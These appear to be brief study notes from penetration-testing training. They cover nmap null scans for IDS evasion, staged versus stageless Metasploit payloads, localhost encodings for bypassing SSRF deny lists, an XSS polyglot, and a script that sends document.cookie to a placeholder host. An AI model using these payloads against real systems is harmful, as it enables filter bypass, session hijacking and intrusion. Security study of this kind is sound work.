nmap -sN (Null) search can be used to evade IDS
in sql, schema=database
in metasploit shells, meterpreter_reverse_shell is stageless but meterpreter/reverse_shell is staged
if it uses _ it is stageless, / is staged
Attackers can bypass a Deny List by using alternative localhost references such as 0, 0.0.0.0, 0000, 127.1, 127...*, 2130706433, 017700000001 or subdomains that have a DNS record which resolves to the IP Address 127.0.0.1 such as 127.0.0.1.nip.io.
jaVasCript:/*-/*/`/’/”/**/(/ */onerror=alert(‘THM’) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/—!>\x3csVg/<sVg/oNloAd=alert(‘THM’)//>\x3e` → polyglot for XSS
<script>fetch('http://{URL_OR_IP}?cookie=' + btoa(document.cookie) );</script> → cookie stealer(?)